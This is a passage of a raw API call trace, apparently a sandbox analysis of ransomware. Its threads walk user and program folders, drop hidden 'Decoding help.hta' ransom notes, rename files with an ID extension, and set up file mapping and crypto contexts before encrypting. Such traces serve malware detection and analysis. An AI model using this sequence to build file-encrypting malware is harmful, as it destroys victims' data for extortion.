0xffffffff [0060.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa60 [0061.554] WriteFile (in: hFile=0xa60, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2ec2fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2ec2fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.555] CloseHandle (hObject=0xa60) returned 1 [0061.555] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.555] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSN Autos.url") returned -1 [0061.555] lstrlenW (lpString="MSN Autos.url") returned 13 [0061.555] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0061.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned 60 [0061.555] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0061.555] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0061.555] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]" [0061.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa60 [0061.556] CreateFileMappingA (hFile=0xa60, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa58 [0061.556] CryptAcquireContextA (phProv=0x2ec2fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 1008 os_tid = 0xe58 [0060.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x2ed6fd30 | out: lpFindFileData=0x2ed6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5650 [0060.310] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.310] FindNextFileW (in: hFindFile=0x10bc5650, lpFindFileData=0x2ed6fd30 | out: lpFindFileData=0x2ed6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.310] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.310] FindNextFileW (in: hFindFile=0x10bc5650, lpFindFileData=0x2ed6fd30 | out: lpFindFileData=0x2ed6fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0060.310] lstrcpyW (in: lpString1=0x1114bb50, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0060.310] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned 60 [0060.310] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Decoding help.hta" [0060.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\decoding help.hta")) returned 0xffffffff [0060.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc70 [0061.559] WriteFile (in: hFile=0xc70, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2ed6fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2ed6fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.560] CloseHandle (hObject=0xc70) returned 1 [0061.560] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.560] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Get Windows Live.url") returned -1 [0061.560] lstrlenW (lpString="Get Windows Live.url") returned 20 [0061.560] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0061.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned 60 [0061.560] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0061.560] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0061.560] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]" [0061.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc70 [0061.561] CreateFileMappingA (hFile=0xc70, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa4c [0061.561] CryptAcquireContextA (phProv=0x2ed6fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 1009 os_tid = 0xcb0 [0060.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2eeafd30 | out: lpFindFileData=0x2eeafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5610 [0060.309] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.309] FindNextFileW (in: hFindFile=0x10bc5610, lpFindFileData=0x2eeafd30 | out: lpFindFileData=0x2eeafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.309] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.309] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.309] FindNextFileW (in: hFindFile=0x10bc5610, lpFindFileData=0x2eeafd30 | out: lpFindFileData=0x2eeafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xd96c, dwReserved0=0x0, dwReserved1=0x0, cFileName="slideShow.js", cAlternateFileName="")) returned 1 [0060.309] lstrcpyW (in: lpString1=0x11143b48, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*" [0060.309] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*") returned 80 [0060.309] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\Decoding help.hta" [0060.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\decoding help.hta")) returned 0xffffffff [0060.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa4c [0061.557] WriteFile (in: hFile=0xa4c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2eeafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2eeafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.558] CloseHandle (hObject=0xa4c) returned 1 [0061.558] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.558] lstrcmpiW (lpString1="Decoding help.hta", lpString2="slideShow.js") returned -1 [0061.558] lstrlenW (lpString="slideShow.js") returned 12 [0061.558] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*" [0061.558] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\*.*") returned 80 [0061.558] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\", lpString2="slideShow.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" [0061.558] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" [0061.558] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js.[ID]g9uZrLhJaygpwRm1[ID]" [0061.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.558] FindNextFileW (in: hFindFile=0x10bc5610, lpFindFileData=0x2eeafd30 | out: lpFindFileData=0x2eeafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xd96c, dwReserved0=0x0, dwReserved1=0x0, cFileName="slideShow.js", cAlternateFileName="")) returned 0 [0061.558] FindClose (in: hFindFile=0x10bc5610 | out: hFindFile=0x10bc5610) returned 1 Thread: id = 1010 os_tid = 0xcb4 [0060.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*", lpFindFileData=0x2efefd30 | out: lpFindFileData=0x2efefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10bc5690 [0060.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.311] FindNextFileW (in: hFindFile=0x10bc5690, lpFindFileData=0x2efefd30 | out: lpFindFileData=0x2efefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.311] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.311] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.311] FindNextFileW (in: hFindFile=0x10bc5690, lpFindFileData=0x2efefd30 | out: lpFindFileData=0x2efefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 1 [0060.312] lstrcpyW (in: lpString1=0x11153b58, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*" [0060.312] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*") returned 75 [0060.312] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\Decoding help.hta" [0060.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\decoding help.hta")) returned 0xffffffff [0060.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa3c [0061.562] WriteFile (in: hFile=0xa3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2efefcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2efefcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.563] CloseHandle (hObject=0xa3c) returned 1 [0061.563] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.563] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cpu.css") returned 1 [0061.563] lstrlenW (lpString="cpu.css") returned 7 [0061.563] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*" [0061.563] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*") returned 75 [0061.563] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\", lpString2="cpu.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" [0061.563] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" [0061.563] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css.[ID]g9uZrLhJaygpwRm1[ID]" [0061.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.563] FindNextFileW (in: hFindFile=0x10bc5690, lpFindFileData=0x2efefd30 | out: lpFindFileData=0x2efefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x55c, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.css", cAlternateFileName="")) returned 0 [0061.563] FindClose (in: hFindFile=0x10bc5690 | out: hFindFile=0x10bc5690) returned 1 Thread: id = 1011 os_tid = 0xcb8 [0060.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\*.*", lpFindFileData=0x2f12fd30 | out: lpFindFileData=0x2f12fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a5e242, 